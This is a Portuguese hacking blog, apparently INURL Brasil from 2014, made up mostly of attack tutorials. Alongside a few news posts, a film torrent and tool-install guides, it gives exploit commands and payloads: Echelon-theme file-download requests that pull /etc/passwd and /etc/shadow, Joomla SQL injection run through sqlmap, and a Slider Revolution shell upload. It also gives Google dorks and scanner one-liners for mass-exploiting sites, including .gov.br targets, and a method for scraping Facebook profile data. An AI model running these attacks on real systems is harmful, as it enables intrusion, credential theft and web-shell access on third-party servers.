domingo, 28 de dezembro de 2014

TUTORIAL Capturing data facebook

TUTORIAL Capturing data facebook

Uma forma simples de pegar dados de usuários facebook
O perfil do alvo deve está parcialmente aberto ou você deve ser amigo do mesmo.
Nem todo perfil temo exito na extração.
--------------------------------------------------------------------------------------------
[TODA INFORMAÇÃO DEVE SER LIVRE]
[جميع المعلومات يجب أن تكون خالية]
[ALL INFORMATION MUST BE FREE]
/*
*/
--------------------------------------------------------------------------------------------

[PROFILE PHOTO]::
https://graph.facebook.com/{USER_OR_ID_USER}/picture?width=2000&height=2000
EX: https://graph.facebook.com/zuck/picture?width=2000&height=2000

[BASIC DATA]::
https://graph.facebook.com/{USER_OR_ID_USER}
 EX: https://graph.facebook.com/zuck
--------------------------------------------------------------------------------------------

[S C R I P T] = > INURL BRASIL / API Facebook Data Mining Utility :: http://packetstormsecurity.com/files/129918/Facebook-Data-Mining-Utility.html

 Description: The script captures uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo

 How to use php face.php {USER_OR_ID_USER}
 http://s21.postimg.org/re018qbvp/Untitled_4.jpg

REF:: http://pastebin.com/PMWXLmyp
--------------------------------------------------------------------------------------------

terça-feira, 23 de dezembro de 2014

Tutorial/Video EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

TUTORIAL ::: E X P L O I T 

$MASS_EXPLOIT = ($Script_Exploit +  $SCANNER_INURLBR);

EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

--------------------------------------------------------------------------------------------------------------
# NAME:::::::: Wordpress A.F.D Theme Echelon
# TIPE:::::::: Arbitrary File Download

# Google DORK: inurl:/wp-content/themes/echelon
# Vendor:::::: www.wordpress.org
# Tested on::: Linux

# EXECUTE::::: php exploit.php www.alvo.com.br
# OUTPUT:::::: EXPLOIT_WPAFD_Echelon.txt
--------------------------------------------------------------------------------------------------------------

EXPLOIT::: 
DOWNLOAD::
LINK[0]::: http://pastebin.com/14uVQyUV
LINK[1]::: http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
--------------------------------------------------------------------------------------------------------------

USE::::::: MASS / USE SCANNER INURLBR
DOWNLOAD::
LINK[0]::: https://github.com/googleinurl/SCANNER-INURLBR
--------------------------------------------------------------------------------------------------------------

COMAND EXEC SCANNER INURLBR / comando de uso....
./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --command-all "php exploit.php _TARGET_"
--------------------------------------------------------------------------------------------------------------

Arquivos que o EXPLOIT verifica::

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file

{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download 
ex:
 _mysite_download_skin=/etc/passwd&submit=Download

[Vídeo]
#-------------------------------------------------------------------
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE:  https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#-------------------------------------------------------------------



sábado, 20 de dezembro de 2014

Algorithm - The Hacker Movie

Um hacker de computador freelance invade contratante governo secreto e faz o download de um programa. Ele deve escolher entre sua própria curiosidade e as vidas de seus amigos.  Sinopse: Em San Francisco, nos meses de setembro de 2012, nove meses antes Edward Snowden vazou documentos que comprovem os espiões da NSA sobre todos, Will, um hacker de computador freelance especializado em invadir sistemas seguros.  Usando uma falha de segurança que encontrou em um trabalho, Will quebra em um empreiteiro e downloads de todos os seus programas recentemente desenvolvidos, incluindo o pastor visivelmente chamado governo ultra-secreta. Toda vez que Will tenta acessar Shepherd, coisas ruins acontecem.  MOTIVAÇÃO  No centro da trama de ALGORITMO são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.  UM MODELO DE NEGÓCIO DIFERENTE  O modelo de negócio para o algoritmo baseia-se nos modelos de startups de tecnologia, conforme descrito na Lean Startup. É um acordo de participação nos lucros, dando a todos que trabalha no filme um grande interesse no sucesso do projeto. Todos os lucros são compartilhadas pelo artista que, na verdade, fez isso acontecer.

Um hacker de computador freelance invade um sistema secreto do governo e faz o download de um programa. Ele deve escolher entre sua própria curiosidade e as vidas de seus amigos.
---------------------------------------------------------------

Sinopse: Em San Francisco, nos meses de setembro de 2012, nove meses antes Edward Snowden vazou documentos que comprovem os espiões da NSA sobre todos, Will, um hacker de computador freelance especializado em invadir sistemas seguros.

Usando uma falha de segurança que encontrou em um trabalho, Will quebra em um empreiteiro e downloads de todos os seus programas recentemente desenvolvidos, incluindo o pastor visivelmente chamado governo ultra-secreta. Toda vez que Will tenta acessar Shepherd, coisas ruins acontecem.

MOTIVAÇÃO

No centro da trama de ALGORITMO são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.

UM MODELO DE NEGÓCIO DIFERENTE

O modelo de negócio para o algoritmo baseia-se nos modelos de startups de tecnologia, conforme descrito na Lean Startup. É um acordo de participação nos lucros, dando a todos que trabalha no filme um grande interesse no sucesso do projeto. Todos os lucros são compartilhadas pelo artista que, na verdade, fez isso acontecer.


Dowload torrent:
https://kickass.so/algorithm-the-hacker-movie-2014-t9335412.html

Dowload  - MP4
http://srv52.clipconverter.cc/download/u87dg6iDraqwZGxum5qWaHJg5KWmqW5q4pSXaXJhmGhtZW20qc%2FMqHyf1qiZpa2d2A%3D%3D/ALGORITHM%3A%20The%20Hacker%20Movie.mp4

sexta-feira, 19 de dezembro de 2014

#SaveThePirateBay, crie e execute SEU PRÓPRIO Pirate Bay

SALVE, crie e execute SEU PRÓPRIO Pirate Bay - Foi disponibilizado código open do (old)pirate bay e seu BD, em um site onde explica passo para criar seu servidor tem o seguinte texto:  Nós, a equipe que lhe trouxe Isohunt.to e oldpiratebay.org queremos levar você ao próximo passo na evolução torrent. Agora você pode executar o seu próprio site Pirate Bay em poucos cliques. Pirate Bay CÓDIGO FONTE ABERTO DARÁ absolutamente a todos com conhecimento mínimo de como Internet e trabalho com Web sites , com alguns conceitos básico de hospedagem, oportunidade de criar Pirate Bay cópia em seus próprios domínios.   Dos criadores de Isohunt.to e OldPirateBay vem uma nova ferramenta que permite que você crie sua própria versão do The Pirate Bay. Um novo projeto conhecido como The Open Bay ajuda a baixar o banco de dados do The Pirate Bay e o código fonte e os scripts necessários para oferecê-la em seu próprio servidor.  De acordo com a descrição do site, "páginas como o Pirate Bay e isoHunt nos deram lições que seria um crime ignorar".  O banco de dados de 420 MB é combinado com a melhor das Isohunt.to, Kick Ass Torrents e The Pirate Bay. O código fonte está disponível via Github e tem um instalador que é rookies prova. Pessoas Isohunt feito esse processo criando OldPirateBay e agora oferece a qualquer um sem pedir nada em troca.  O lançamento do The Open Bay leva algumas semanas para o The Pirate Bay foram fechadas pela polícia sueca. Em geral, a idéia é muito interessante e confirma o quão difícil será para as autoridades para acabar com um dos melhores sites de torrent.


Foi disponibilizado código open do (old)pirate bay e seu BD, em um site onde explica passo para criar seu servidor e publica-lo, E tem o seguinte texto:

Nós, a equipe que lhe trouxe Isohunt.to e oldpiratebay.org queremos levar você ao próximo passo na evolução torrent. Agora você pode executar o seu próprio site Pirate Bay em poucos cliques.
Pirate Bay CÓDIGO FONTE ABERTO DARÁ absolutamente a todos com conhecimento mínimo de como Internet e trabalho com Web sites , com alguns conceitos básico de hospedagem, oportunidade de criar Pirate Bay cópia em seus próprios domínios.


Dos criadores de Isohunt.to e OldPirateBay vem uma nova ferramenta que permite que você crie sua própria versão do The Pirate Bay. Um novo projeto conhecido como The Open Bay ajuda a baixar o banco de dados do The Pirate Bay e o código fonte e os scripts necessários para oferecê-la em seu próprio servidor.


De acordo com a descrição do site, "páginas como o Pirate Bay e isoHunt nos deram lições que seria um crime ignorar".

O banco de dados de 420 MB é combinado com a melhor das Isohunt.to, Kick Ass Torrents e The Pirate Bay. O código fonte está disponível via Github e tem um instalador que é rookies prova. Pessoas Isohunt feito esse processo criando OldPirateBay e agora oferece a qualquer um sem pedir nada em troca.

O lançamento do The Open Bay leva algumas semanas para o The Pirate Bay foram fechadas pela polícia sueca. Em geral, a idéia é muito interessante e confirma o quão difícil será para as autoridades para acabar com um dos melhores sites de torrent.

:: BAIXAR PROJETO ::  https://github.com/isohuntto/openbay

:: BAIXAR PROJETO :: 
----------------------------------------------------------------------------------------

:: BAIXAR BANCO TORRENT ::   http://openbay.isohunt.to/files/openbay-db-dump.torrent

:: BAIXAR BANCO TORRENT :: 
O melhor conteúdo de torrent do Kick Ass Torrents, Isohunt.to e Pirate Bay para dar às pessoas o melhor e mais novo conteúdo.

----------------------------------------------------------------------------------------

Instalação
Passo 1. Download source.

Faça download da versão mais recente do engine em openbay.isohunt.to ou em página web do projeto GitHub.

Passo 2. Upload - Carregue a source escolhida na hospedagem.

A publicação é comum de qualquer outro código fonte basta usar o ftp ou painel cpanel/gerenciamento disponível.

Passo 3. Descompacte fonte de hospedagem pasta (opcional)

Este passo é completamente opcional. Depende do seu web hosting. Alguns hostings pode descompactar fontes automaticamente alguns deles permite que você faça-o manualmente.

Passo 4. Set ambiente de hospedagem (opcional)

Apache

Esta opção está disponível por padrão no pacote source original.
Você pode vê-lo em conf/example.htaccess

Nginx

Esta configuração está disponível no pacote fonte original em /conf/example.nginx.conf

Sphinx (modo avançado)
https://github.com/isohuntto/openbay/wiki/sphinx

MySQL (modo avançado)
Antes executar, você precisa criar uma base de dados, o esquema da base de dados será criado pelo assistente. Dump SQL caminho:  /src/protected/data/schema.mysql.sql

Passo 5. prosseguindo 

Parabéns! Agora você pode abrir o seu nome de domínio com qualquer navegador e siga o guia fornecida lá. Como padrão, você terá que colocar o título da página que vai aparecer em todas as suas páginas.

Instruções detalhadas aqui
https://github.com/isohuntto/openbay/wiki/shared-hosting-guide


Apache > = 2. *
PHP versão > = 5,3, com os módulos instalados: DOP, PDO_MYSQL
Qualquer nome de domínio
Engine Sphinx > = 2,1
MySQL > = 5. *

quinta-feira, 18 de dezembro de 2014

FBI usa Metasploit Decloak Para expor os usuários TOR.

Metasploit, uma criação de um hacker(H.D. Moore)  white hat em 2003, foi o mais procuradoa ferramenta de hacking por quase uma década; uma espécie de canivete suíço de hacks que permite que um hacker vasculhe  redes de clientes.  A ferramenta é tão útil  que até mesmo FBI não poderia ficar longe dela. De acordo com um relatório recente da WIRED, FBI usou um código Flash a partir de um projeto paralelo Metasploit abandonado "Decloaking Engine" para identificar os suspeitos que se escondem atrás do anonimato da rede TOR. Decloaking Engine - "Esta ferramenta demonstra um sistema que identifica o endereço IP real de um usuário da web, independentemente das configurações de proxy, usando uma combinação de tecnologias do lado do cliente e serviços personalizados, Usa como componentes JAVA e FLASH Para ser executado lado cliente."


Metasploit, uma criação de um hacker(H.D. Moore)  white hat em 2003, foi o mais procuradoa ferramenta de hacking por quase uma década; uma espécie de canivete suíço de hacks que permite que um hacker vasculhe  redes de clientes.

A ferramenta é tão útil  que até mesmo FBI não poderia ficar longe dela. De acordo com um relatório recente da WIRED, FBI usou um código Flash a partir de um projeto paralelo Metasploit abandonado "Decloaking Engine" para identificar os suspeitos que se escondem atrás do anonimato da rede TOR.
Decloaking Engine - "Esta ferramenta demonstra um sistema que identifica o endereço IP real de um usuário da web, independentemente das configurações de proxy, usando uma combinação de tecnologias do lado do cliente e serviços personalizados, Usa como componentes JAVA e FLASH
Para ser executado lado cliente."


JAVA::    https://web.archive.org/web/20110314002349/http://decloak.net/HelloWorld.java
FLASH:https://web.archive.org/web/20110723083748/http://decloak.net/Decloak.hx

A ferramenta foi utilizada em "Operation Torpedo", uma operação policial visando três usuários dos sites da DarkNet/DW de pornografia infantil. Um advogado de um dos réus está agora desafiando a confiabilidade do hackerware como uma evidência científica admissível no Supremo Tribunal Federal.

O assunto será tratado em tribunal em 23 de fevereiro de 2015.

Tor, um projeto livre, de código aberto, é um software de anonimato que protege os usuários por roteamento de tráfego por meio de conexões criptografadas. Ele é bastante popular entre os criminosos, ativistas de direitos humanos, ativistas, jornalistas, hacking e denunciantes.
O software processa um servidor web inútil para as autoridades de aplicação da lei, porque enfatiza a informação muito limitada sobre um usuário para o nó Tor mais próximo.

Metasploit, criado em 2003, é um open-source ferramenta de teste de penetração que permite aos usuários organizar e efetuar ataques de componentes. Mais tarde, em 2006, Moore lançou o "Metasploit Decloaking Engine," Com cinco truques, para romper sistemas de anonimato.
No entanto, qualquer erro exporia a identidade do utilizador.

Decloaking Engine, como implantação de spyware, é bastante leve e foi usado contra cada visitante do site, um caso de implantação de spyware em massa. A Conferência Judicial dos Estados Unidos está trabalhando em uma petição do Departamento de Justiça para permitir explicitamente implantações de spyware.

Enquanto isso está acontecendo, capacidades anti-tor do FBI realmente melhoraram de forma alarmante.

"No curso de nove meses, eles foram de fora as técnicas de Flash que simplesmente se aproveitam da falta de proteção proxy, para explorações do navegador custom-built", diz Chris Soghoian, principal tecnólogo na ACLU.

http://hackread.com/fbi-used-metasploit-decloak-expose-tor-users/

quarta-feira, 17 de dezembro de 2014

NSA tem o seu próprio motor de busca de metadados


NSA tem o seu próprio motor de busca de metadados
NSA supostamente desenvolveu um motor de busca para procurar metadados e compartilhá-lo com outras agências governamentais americanas, incluindo o FBI e DEA. O Intercept informou que com base nos documentos vazados do denunciante Edward Snowden.

O motor de busca tem ICREACH(Seu nome é baseado no acrônimo para a Intelligence Community Reach) e é capaz de pesquisar através de 860.000.000.000 entradas de dados sobre chamadas telefônicas, e-mails, faxes, mensagens de texto, locais de telefone celular e conversas de bate-papo on-line. Mais de 1.000 analistas e 23 agências governamentais têm acesso ao motor de busca.

ICREACH foi projetado para ser adequado para a partilha dos dados secretos de vigilância nos EUA e é capaz de lidar com 2-5000000000 novas entradas de dados todos os dias. As informações coletadas, o que é essencialmente derivada de comunicações estrangeiras de vigilância, é composto por mais de 30 tipos diferentes de metadados. Especialistas legais estão alarmados com o tamanho do motor de busca e temem que as informações sejam utilizado para investigações não-relacionados com o terrorismo, que não é muita novidade para o cenário  investigativo NSA.


ICREACH foi projetado para ser adequado para a partilha dos dados secretos de vigilância nos EUA e é capaz de lidar com 2-5000000000 novas entradas de dados todos os dias. As informações coletadas, o que é essencialmente derivada de comunicações estrangeiras de vigilância, é composto por mais de 30 tipos diferentes de metadados. Especialistas legais estão alarmados com o tamanho do motor de busca e temem que as informações sejam utilizado para investigações não-relacionados com o terrorismo, que não é muita novidade para o cenário  investigativo NSA.


Revelações anteriores que tem origem nos documentos Snowden expuseram uma infinidade de programas da NSA para que recolhem grandes volumes de comunicações. A NSA reconheceu que compartilha alguns de seus dados coletados com agências nacionais, como o FBI, mas os detalhes sobre o método e seu âmbito de partilha permaneceram envolto em segredo.

Revelações anteriores que tem origem nos documentos Snowden expuseram uma infinidade de programas da NSA para que recolhem grandes volumes de comunicações. A NSA reconheceu que compartilha alguns de seus dados coletados com agências nacionais, como o FBI, mas os detalhes sobre o método e seu âmbito de partilha permaneceram envolto em segredo.

ICREACH tem sido acessível a mais de 1.000 analistas em 23 agências do governo dos EUA que realizam trabalho de inteligência, de acordo com um memorando de 2010. Um documento de planejamento a partir de 2007 lista o DEA, FBI, CIA e da Agência de Inteligência de Defesa, como membros do núcleo. Informação divulgada através ICREACH pode ser usado para rastrear os movimentos de pessoas, mapear suas redes de associados, ajudar a prever ações futuras e potencialmente revelar afiliações religiosas ou convicções políticas.

A criação do ICREACH representou um momento marcante na história da das classificadas redes de vigilância do governo dos EUA, de acordo com os documentos da NSA.

Em uma declaração sobre as interceptações, o Escritório do Diretor de Inteligência Nacional USA confirmou que os dados do sistema que é varrido por programas autorizados nos termos da Ordem Executiva 12333, uma directiva presidencial controversa Reagan-era que sustenta várias operações de vigilância em massa da NSA que monitoram comunicações no exterior. A vigilância 12333 ocorre sem supervisão judicial e recebeu escrutínio do Congresso mínima porque ele é direcionado a, redes de comunicação estrangeiros, não domésticos. Mas a ampla escala de 12333 vigilância significa que as comunicações alguns americanos pegos na varredura.

Referencias:
http://fr.wikipedia.org/wiki/ICREACH
http://blog.scanarch.com/nsa-has-its-own-search-engine-for-metadata/
https://firstlook.org/theintercept/2014/08/25/icreach-nsa-cia-secret-google-crisscross-proton/

INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --command-all

Joomla Component com_page - SQL Injection
INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --comand-all
Explorando falha SQL componente com_page o diferencial que vamos utilizar 2 ferramentas para otimizar o tempo de analise:
DORK[1]:
inurl:index.php?option=com_page&id_p=
--------------------------------------------------------------------------------------
DORK[2]: 
intext:option=com_page
--------------------------------------------------------------------------------------

Otimizando a busca
Quando usamos dorks temos um trabalho de acessar cada site testar e verificar se está vulnerável, muitas vezes remontar a url alvo.
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.

Logica de processo:
  1. BUSCAR ALVOS EM MOTORES DE BUSCA.
  2. RETIRAR URLS INDESEJADAS.
  3. RETIRAR DUPLICATAS.
  4. CONVERTER VALORES EM UM ARRAY DE DADOS.
  5. ACESSAR ARRAY E PROCESSAR CADA URL INDIVIDUALMENTE.
  6. ANALISAR ERROS PADRÕES OU PERSONALIZAS.
  7. SE (OPÇÃO COMAND ESTIVER SETADA SERÁ EXECUTADO UM COMANDO NO TERMINAL) 
  8. ALVOS QUE FOREM ENCONTRADOS ERROS PADRÕES PREDEFINIDOS NO SCRIPT SERÁ SEPARADO EM UM ARQUIVO OUTPUT.

Usando SCANNER INURLBR:
Comando->{

Exmplo:
./inurlbr.php 
--dork 'YOUR_DORK' 
-s OUTPUT.txt  
-q  {OP_MOTOR_SEARCH}
--comand-all 'RUN_YOUR_COMMAND_IN_TERMINAL'

Usando:
./inurlbr.php --dork 'inurl:index.php?option=com_page & id_p' -s joomla.txt -q 1,6 --command-all './../../../googleinurl/pentest/sqlmap/sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

Observação parâmetro --command-all:
Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca.
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

Indo a fundo em --command-*
--command-vul Cada URL vulnerável encontrada irá executar os parâmetros deste comando.
      Exemplo: --command-vul {comando}
      Uso: --command-vul "nmap sV -p 22,80,21 _TARGET_ '
               --command-vul './exploit.sh _TARGET_ output.txt'

  --command-all Utilize este comand para especificar um único comando a cada URL encontrado.
      Exemplo: --command-all {comando}
      Uso: --command-all 'nmap sV -p 22,80,21 _TARGET_'
               --command-all './exploit.sh _TARGET_ output.txt'

observação:

     _TARGET_ Será substituído pelo URL filtrando somente o domínio.
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br

    _TARGETFULL_ Será substituído pelo URL / alvo original encontrado.
Ex: www.google.com.br/?q=testeste _TARGETFULL_ = www.google.com.br/?q=testeste

Em nosso caso exploramos uma falha SQL-Injection com SQLMAP.
sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

RESULTADO:
Observação parâmetro --comand-all: Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca. Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP, O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

}


Referencias

terça-feira, 16 de dezembro de 2014

Wordpress A.F.D Theme Echelon Explorando tema wordpress falha Arbitrary File Download

EXPLOIT Wordpress A.F.D Theme Echelon
EXPLOIT Wordpress A.F.D Theme Echelon Explorando tema Echelon do wordpress falha Arbitrary File Download
Explorando tema Echelon do wordpress falha Arbitrary File Download

# NAME:         Wordpress A.F.D Theme Echelon
# TIPE:         Arbitrary File Download
# Vendor:       www.wordpress.org
# Tested on:    Linux
# EXECUTE:      php exploit.php www.alvo.com.br
# OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

Pois bem já que o 1337day não publicou o script posto aqui, "alias tem muito bla bla pra preeche odeio" rsrs.

A falha consista em explorar um um parâmetro $_POST do arquivo
/wp-content/themes/echelon/lib/scripts/dl-skin.php

Os seguintes campos são explorados para o Arbitrary File Download
Via POST:
_mysite_download_skin={$config['file']}&submit=Download
Ex:
_mysite_download_skin=/etc/passwd&submit=Download

Sem os devidos filtros podemos ter acesso a arquivos internos do servidor alvo.
Para tal validação desenvolvi um exploit pra validar tais valores expotos pelo /etc/passwd e  /etc/ shadow encontrando padrão baseado na seguintes expressões regulares:
------------------------------------------------------------------------------------------------
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
------------------------------------------------------------------------------------------------

Exploração:

Baixar Exploit: http://pastebin.com/14uVQyUV / http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
Modo de executar:
php exploit.php http://alvo
Resultado:
php exploit.php http://alvo


Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!

Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

Comando de execução:
./inurlbr.php --dork '[DORK]inurl:/wp-content/themes/echelon[DORK]"index of" /themes/echelon' -q 1,6 -s save.txt --comand-all "php exploitAFD.php _TARGET_"

Explicando comando:

--dork vai definir código avançado de busca google.
[DORK] é uma expressão usada dentro do parâmetro --dork que possibilita usar varias dorks em uma só analise.
-s salvar alguns sites vulns caso o scanner encontre.
-q define motores de busca a serem usados.
--comand-all executa comando no terminal para cada alvo encontrado.
para mais informações sobre --comand consulte o help do script.
Ajuda:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Resultado execução:
 Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!


Pesquisa dork:
DORK: inurl:/wp-content/themes/echelon
DORK: "index of" /themes/echelon

Baixar Exploit: http://pastebin.com/14uVQyUV
Ajuda: https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

sexta-feira, 12 de dezembro de 2014

WPScan DB & WPScan software

Conheça o WPScan Vulnerability Database  criado por Ryan Dewhurst @ethicalhack3r

Conheça o WPScan Vulnerability Database 
criado por Ryan Dewhurst @ethicalhack3r

WPScan é uma Open Source black box scanner de vulnerabilidade WordPress Open Source.
WPScan é escrito em Ruby, a primeira versão do WPScan foi lançado no dia 16 de junho de 2011. Hoje WPScan é mantido pela Equipe WPScan e outros contribuidores Open Source. Se você gostaria de usar e / ou contribuir para WPScan você pode fazê-lo a partir do repositório
Github - https://github.com/wpscanteam/wpscan/ WPScan é uma Open Source black box scanner de vulnerabilidade WordPress Open Source.  WPScan é escrito em Ruby, a primeira versão do WPScan foi lançado no dia 16 de junho de 2011. Hoje WPScan é mantido pela Equipe WPScan e outros contribuidores Open Source. Se você gostaria de usar e / ou contribuir para WPScan você pode fazê-lo a partir do repositório

Github - https://github.com/wpscanteam/wpscan/

WPScan Vulnerability Database
O WPScan Vulnerability Database é uma versão navegável on-line de arquivos de dados do WPScan que são usados para detectar conhecido WordPress núcleo, plugins e temas vulnerabilidades.  Esta base de dados foi elaborado pela Equipe WPScan e vários outros contribuidores Open Source desde o lançamento do WPScan. O desenvolvimento da Vulnerabilidade WPScan banco de dados foi financiado pelo projeto 5by5 de BruCON.

O WPScan Vulnerability Database é uma versão navegável on-line de arquivos de dados do WPScan que são usados para detectar conhecido WordPress núcleo, plugins e temas vulnerabilidades.
Esta base de dados foi elaborado pela Equipe WPScan e vários outros contribuidores Open Source desde o lançamento do WPScan. O desenvolvimento da Vulnerabilidade WPScan banco de dados foi financiado pelo projeto 5by5 de BruCON.

Fora a versão navegável existe o próprio WPscan que analisa tais vulnerabilidades(http://wpscan.org/)

WPScan vem pré-instalado nos seguintes distribuições Linux:

  1. backbox Linux
  2. Kali Linux
  3. Pentoo
  4. SamuraiWTF
  5. ArchAssault

Prerequisites:


  1. Ruby >= 1.9.2 - Recommended: 2.1.4
  2. Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault
  3. RubyGems - Recommended: latest
  4. Git
DEMONSTRAÇÃO DE USO BRUTE FORCE:

ENUMERAÇÃO DE DADOS:

Installing on Ubuntu:

Before Ubuntu 14.04:

sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test

Installing on Debian:

sudo apt-get install git ruby ruby-dev libcurl4-gnutls-dev make
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler
bundle install --without test --path vendor/bundle
Installing on Fedora:

sudo yum install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test

Installing on Archlinux:

pacman -Syu ruby
pacman -Syu libyaml
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test
gem install typhoeus
gem install nokogiri


quinta-feira, 27 de novembro de 2014

Explorando Slider Revolution/Showbiz Pro Shell Upload Exploit

Explorando Slider Revolution/Showbiz Pro Shell Upload Exploit

0x===> Slider Revolution/Showbiz Pro Shell Upload Exploit

Bom vamos lá novamente surge um bug critico em um plugin do Wordpress novamente o plugin afetado é o Slider Revolution estima-se que atualmente ele seja o plugin para slider.

[INFO INTERNA DO EXPLOIT]{
Além da vulnerabilidade LFI recentemente que foi publicado há alguns meses, esta é uma outra vulnerabilidade que os desenvolvedores não corrigiram.
Decidiram disponibilizar sem liberar um boletim de segurança completo, deixando milhares de usuários revslider que não atualizam o seu plugin para a versão mais recente (=> 3.0.96) vulnerável a esta falha desagradável, revsliders desenvolvedores irão argumentar o fato de que seu controle vem com um recurso de atualização automática, mas o problema é que este plugin é empacotado com um monte de temas, o que significa que esses temas os usuários podem não conseguir as devidas atualizações de plugins ou terá que pagar para obter a atualização. Em outras palavras desenvolvedores da revslider acredito que cada usuário deve ter o recurso de atualização automática, caso contrário ... você está ferrado.
 Obviamente, isso é muito mais importante do que a vulnerabilidade LFI, pois permite o acesso shell dando atacantes acesso ao sistema de destino bem como a capacidade para despejar todo o banco de dados wordpress localmente.
Dito isto, deve-se atualizar imediatamente para a versão mais recente ou desativar / switch para outro plugin.
Quanto Showbiz Pro, infelizmente a vulnerabilidade nunca foi criado um patched como foi explorada com sucesso na última versão (1.7.1)
}

Download:
Exploit:

Exploit update zip files:

Dependências de para uso:
Requires LWP::UserAgent
apt-get install libwww-perl
yum install libwww-perl
perl -MCPAN -e 'install Bundle::LWP'

For SSL support:
apt-get install liblwp-protocol-https-perl
yum install perl-Crypt-SSLeay

Começando a exploração

Primeiro baixaremos o exploit http://1337day.com/exploit/22938
No código do exploit encontramos dois zip's citados acima para baixar:

Exploit update zip files: http://www.morxploit.com/morxploits/revslider.zip http://www.morxploit.com/morxploits/showbiz.zip


Fazemos o download dos arquivos na mesma pasta em que o exploit.pl esteja alocado.
Mãos a obra 

0x Comando / Demo: 
  1. perl exploit.pl <target> <plugin>
  2. perl exploit.pl http://localhost revslider
  3. perl exploit.pl http://localhost showbiz
  4. perl exploit.pl http://localhost revslider



A primeira forma de explorar essa falha é pegando acesso via terminal nos dando acesso a pasta
"wp-content/plugins/__PLUGIN__/temp/update_extract/__PLUGIN__/"
 (os locais com __PLUGIN__ é o nome do plugin escolhido),
 Depois de tal processo se foi executado com sucesso apos isso é temos acesso ao terminal shell da maquina vulnerável, assim executando comandos como id,ls,wget entre outros.

A segunda maneira que o exploit nos permite obter acesso é por meio de uma webshell que fica alocada em "wp-content/plugins/__PLUGIN__/temp/update_extract/temp.php".

DORK[0] site:.gov.br inurl:/temp/update_extract/ revslider
DORK[1] site:.br inurl:/temp/update_extract/ revslider
DORK[2] site:.br inurl:/temp/update_extract/

Comando compatível com SCANNER INURLBR

./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'


Comando compatível com SCANNER INURLBR:   ./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'

